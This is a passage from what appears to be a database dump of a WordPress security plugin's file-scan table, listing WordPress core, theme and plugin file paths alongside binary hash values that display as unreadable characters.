��W��A��2Lh�`���i�%iv�2���޴','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����\"@rX���X','��m��j��$]���^�I��\'��G���[���','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('� ����K i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('�g��\r��鮨','wp-content/themes/newsmagbd/vendors/bootstrap/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��e��W����','&4\\lw�\0�j�D�n���zVMG\0������','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V�	��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('(�9l1��5nq���','wp-includes/blocks/button/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c2R{DbYg�E�<[ ','4�8��e)oa���O8��fmy����E���','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�8|NK(�:2�j','\ni��{�J�~d���H��ّ��\n��yo�g�','',0,'?'),('-�c��U�H;Ԓ��','wp-content/plugins/redirection/locale/redirection-es_MX.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kbq�^�{�&Ŋ&','-�f�MX�,�@�$�M1!�-۸��_����W\\�','',0,'?'),('3x2�§��h�_','wp-includes/blocks/shortcode/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͻ�0E���<��#�','I�D�W�=�~7�����(���3E���b$@x`�','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�ڭ�#rz�R�9�','��2���H*Im]2��t%[���^`?�kh]Z','',0,'?'),('})Z��#4�c��4�','wp-content/plugins/wp-cerber/assets/flags/au.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('�x#��*W`P���D�','wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�&��:^��!��y�','����y�ӑ4UVȡF>/��m��#�<{�r�','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s��B�\Z�?���l','6l.v>��\\��c�4շ=T��~l�F��n�','',0,'?'),('?��|꺯��~x����','wp-includes/blocks/query/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VY���8B���K�)�{','�j\'��ۉ�>MOB��UZ��–�h��fy\r�','',0,'?'),('_���\0.�6�l�q�','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u	Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('~)�zL�� T\0�','wp-content/plugins/redirection/matches/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�(�(!������','��GICuǶ�N!V�-��I�u��\Z���u�','',0,'?'),('�܈�y��7@����\"','wp-includes/blocks/audio/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�\n>o�`�����','3\r���gK|�P35�����E����=�k�','',0,'?'),('��k[҄.? F�R�p@','wp-content/plugins/wp-cerber/assets/flags/vc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C)���y$���%�E','���N�h��А!�o�:s1�o�~%�`�','',0,'?'),('���\n�#�T��?׻��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2W�L��;m�06��','�Є�<�EHm`^�w�I����b�����M�','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`%��F�S&s��L�','q0:c�{>���q|U,��p�\\Hޞ��h\\a�H','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��HPUʭ�]gkZ�','%�\0Y�TQ�[�%�	�T�\0����W�~��2�','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vt�)l�[:�����','�Y����i$>�8\nvM{�B��R��!���^','',0,'?'),('\0�,�#�heLG�(}','wp-includes/blocks/query-pagination-numbers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vw\n>�FB�{>��l�v','��Z���&�ϵ�܊�<,�Zϊ��[y�','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH�	\n��g��','',0,'?'),('3���X�G%<!>','wp-includes/blocks/pullquote/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O)r���B\\���O��','��3B��>��t7~g� �8z�v��q�^g3�I>','',0,'?'),('9*I���Cc����','wp-includes/blocks/post-excerpt/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vӶ=dR\"<�k���U�','���%�#\0e��V�m�-�/�X�@�SW�z�?�','',0,'?'),('q���_\"�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s`���pxMf{��\n�','�*0�ؤ���3B�j�	q�29�\0 (�~','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7	��y�񮌬��U{����ԟ��`��]m��','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�[7�e�C����$�','\rN����X_���hɗz���H�2Tj�','',0,'?'),('�&0�%���K��.�','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\0����A��','�aĭ�Q���jΞ��{b�!1�I��}\nK�','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('	e�حV�M��y�','wp-includes/blocks/rss/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')0�7|��ˢ�H{q','��{o/d�эۘDU__�;z�T���oE��','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uӆ?/[�(\rC��X','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����]!��8��','���ݒk�\"G�\0���%��e$���û��','',0,'?'),('7�c-���kЄ\"�`k','wp-includes/blocks/html/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t\0E�8���P�*j��','�P4WW@��W&&�a$�<j���Ց��Q��','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N6TZ.�|���k�','yj�	K�o�nU\r)�O#�Ͼ�quܾ��?�j�','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�g�m�9Jud�g�h','�g~�#A��G�B�|�տ��/�zm�+�|�','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�غ�0��{8IU��ৣ','+k	�/�,Z]�.��V��j�|Cۇl��ū','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^Ǿa�\0��lpP;�','w�B�}BnǾ���5����z�MW�$F�Z�}J?�?','',0,'?'),('�< =�q���K�iU','wp-content/plugins/redirection/locale/redirection.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������r]�L�','`��h\n�r�POї>�\r�A�r���E��cd&�h','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������k�3\n~9�8&','��}�N��v����[�a��(``Э� \"��','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Bɀ#ɯ�@b','���Om��Ӕ.x�-�Y�(�VOc�pԮY��','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('k�\0�`}����4v','wp-content/plugins/wp-cerber/assets/flags/re.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('o���	l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F�Ȍ�','',0,'?'),('�x��|s����K�a�','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��YJ��Jk���','��\Z=�DBא��	%%A?O�w��*/�~u','',0,'?'),('���#����	>�7','wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),('ņL�G��P(�Ή�ȯ','wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���\'q�E�����P�',',����~1�K�}@uf���d��9�E���D�Q','',0,'?'),('�&�	A�H��)�I&��','wp-includes/js/dist/vendor/moment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}J�3���p���S�f','��v��[c��e�v;�*WgOAG�@��i&','',0,'?'),('�cY�F���}�j`��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����b(浏К','n;�<��	Ǖ�-W�t��]��<�s���u�','',0,'?'),('&��2������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ylh��w�%Re���','���\njq�W��	�v_�#�� f��~��R�>','',0,'?'),('#�7��r�Y�\0��i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��fZ�؍PIR&i��','�EQtY�=�j.#eW㈤A3QcP��T�','',0,'?'),('&#�p�J��h��','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eT�U���t�)�d!','c	��g:�d�O�z�_fp�5\0��Ɍix','',0,'?'),(',!#Q��P�[;����','wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�P��y�BB&F4','�k������i�]J��	��ƙ۰Tl��x�','',0,'?'),('4��ہ��;�0�.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(G\"n�rPi�)߬�j','\r�FA�me�a	r��-�w�Y�E�u�����u','',0,'?'),(':뭲c��RPe(','wp-includes/rest-api/class-wp-rest-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}h=$�TT�\'5�','9����2�9��&��a�M���,z','',0,'?'),('G5\"�]qm��S�','wp-content/plugins/wordfence/css/dt_table.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('K��xP0&���O:p','wp-includes/blocks/archives/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rv}��\')4~~�','Ƹ�C�YM����a.L���8�yQ�v�q�I�','',0,'?'),('T?�,%,�zG%���','wp-content/plugins/wp-cerber/assets/select2/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABQ,�:	��\r�j','����Z5L�ѾR��9���	`C���)�M','',0,'?'),('e؟�v���笪�Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �UwYI��I�}�','���ݠ\r��ڗU�D�PT���V+6��^:2!���','',0,'?'),('k\0\Z���{ ݛ6�','wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~k�_35=9�*��','��R��)�Vj�v,%�:`���X���O�}�#','',0,'?'),('k����b��gS�','wp-includes/js/tinymce/plugins/wplink/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('����57��D�;TkC','wp-includes/blocks/social-links/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fH�p�΂���W�','�X�׭���`��27�<�)���9�;�Ҳ\n','',0,'?'),('���L��.�\n�w;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E	4m�Y�>�`��','�#�_�[Ѹ��@u�Ha�(+j>V\Z+�q[V','',0,'?'),('����g�~�w\Z�hh','wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~O���W;�i�<װ��','�X^�8�7�$�p�\\�ۙ4D�mJ\r�5�@�2�N','',0,'?'),('�/�V�	X�[�\n�','wp-content/plugins/wp-cerber/assets/flags/cv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#!�C�@���','�#���wQ�u����g���u��w[��ȥ~','',0,'?'),('� \\i����x��(0�','wp-includes/blocks/text-columns/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u_�<�8��̆Al','!����V����jd^w!�l2ڶ�Z�Rfb%+�ؤ','',0,'?'),('�ͥ`FJ��S�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+U��Ÿ(�5\\','8:��o�I�9,��=zDk8;�{A{�\Zij','',0,'?'),('��bm�%����ڭ֫','wp-includes/Requests/Exception/HTTP/502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L+��D��/n�cQr','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),('	QW���~-�\0d�','wp-includes/class-phpass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�8����ؾO','�5�{�dp#��d��3�x`�J4�j~p���','',0,'?'),('	?������q�uM','wp-includes/js/mediaelement/mediaelementplayer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),('	,��/Օ�!�gy�d','wp-includes/js/media-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),('	2�p�<(X�\"�ݵ�','wp-includes/blocks/audio/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5���3�yb�A�','��@,BW/�R-�M�w�›�����]ٻ','',0,'?'),('	7�������f	`','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�m	�8�f�|�Y��','~�%��ۉ�%���>����Bl�o�u�I)ȉ7g','',0,'?'),('	J�����;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),('	P=N>��b\"j:~[Q{�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),('	X�t\\4vNI5��j��','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�#9ou�o<�B���','���`���V�\r�FA�����Y,(�lBA���!','',0,'?'),('	t]�9��\'�����','wp-includes/blocks/nextpage/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�i<�Zҵ�f\r>T','�\r=��G��?\Z���6�!!�o��\ZT�I9�\"U','',0,'?'),('	���RL��6�L�n�','wp-content/plugins/redirection/locale/redirection-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j.�&�y���O���','R���O錱tW�K��5i0�ep�ªVS\"st�','',0,'?'),('	�h�Xk%�>���{N�B','wp-includes/js/dist/viewport.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��K��9A�f��P','�m����I=�}i�ZoEĆ������2�E.�','',0,'?'),('	�.��5ua�WkJ��','wp-includes/Requests/Exception/HTTP/413.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��2ɑI�W�v�MZ','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),('	��V��z�Dߊ}k�','wp-content/plugins/wordfence/js/jquery.colorbox.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O�0%6�9�e�3�j','{�L�#�\r��]�\ngL8P,���@��Ir,{ �','',0,'?'),('	Ӱꅑ��������c','wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	I\\wzzW�~��HO�9','�`�BE`sr�A���I�Hoގ3�_ʘ�%�	','',0,'?'),('	�9��fވU�f���','wp-includes/js/tinymce/tinymce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl����̡C��kn','�Zk�	�6|��{�*\Z��{�H����iܝk^','',0,'?'),('	�)a��x��u���','wp-content/plugins/wp-cerber/assets/flags/sm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�4��f�����u�n','���v-��d1�Y2�0�-�����*�����','',0,'?'),('	��Ih�B�pO','wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�.�7H��J0B�;','%�u6K���酑&�]*�$t�h_�G-\0t{~','',0,'?'),('	����09��-b��ͩW','wp-admin/network/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�Gc���o�_�K','�V� m������y���xՈ{������','',0,'?'),('	�/�?��^��E�Ց','wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),('\n�	6��4R�9���','wp-includes/blocks/social-links/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v@��ð��uD���K','}%h׺�k�8P���`w��w�F�qV��7�J�','',0,'?'),('\nT��/\\9$Y�U\n��͌','wp-includes/customize/class-wp-widget-form-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('\nf���Y��4&�L�','wp-admin/images/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȔB�`��.}\'7:','Y������\"K��{�U���r�:2��JL���','',0,'?'),('\nz�ŭ�}�{�.�u[�','wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�T������$�5`�','7{���v�>���R�;‚�^�����4Q�eu','',0,'?'),('\n{X%N8Ÿw�2?M4C�','wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ΔYc�s�Mi(�;�','e��+1�u �����!\0	)�uP�/�.��!�~�','',0,'?'),('\n}��\'٩B�3�9�:�','wp-includes/blocks/table/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����d�O+5j�=','\ZDa��:�9�$��������\ZL�l�l','',0,'?'),('\n���f�Ӆ;{�t��','wp-includes/class-wp-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('\n��\'�G�~R*��dj�','wp-content/plugins/redirection/models/action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����0kӂY�','I�\01���씟��>7t�)\"�\rϰ�w��K','',0,'?'),('\n��B�/��ޕ6h9g','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_PT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iՍf��lFb�\Z��','C��S3n��w_��#m٠!!R�_�����2','',0,'?'),('\n���b-�V�:��|m��','wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��Zeq�i�[��\rv','[��ϣb]�9�\\�|��ֲ*V\r�~��z�^','',0,'?'),('\n�����#���x|]','wp-includes/blocks/site-tagline/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',=��SPE��ҧ��','ʈ�	�ؿߥ��~��E��k��,f����f�R','',0,'?'),('\n��NNM��ۑ4;�p�4','wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('\n�@�g��+T;V��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���\r@)��뻚','�;����_I��m�1�����\n�9|!޶��','',0,'?'),('\n�N����J�\'','wp-content/plugins/redirection/models/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c���A�S�e�􌁢�z','Xr�\'��k�U��\\\\��x�$�r�����)��','',0,'?'),('\n�\r�B��p̭','wp-admin/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!�/[�^0\'c�Q�','l�1��m5�cMc�Y�)�Uɓy1�탞�K�N','',0,'?'),('\n��:�X2�L��nc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�z��p���(�,','��,����%u\Z��Rz�B�\r#��~�+`�5y�','',0,'?'),('\n�Gƙn��\Z@1+U]�','wp-admin/css/revisions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ϳ�FY�� p*','~!Z���7��/���<��3�Y�,�=Zk(','',0,'?'),('̱7��e�|�hȜx�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�� �An�gKGi�','��LE������r/�g����ɣ�\'l�Q�!��','',0,'?'),('\"w%�_��K\\��u�','wp-admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k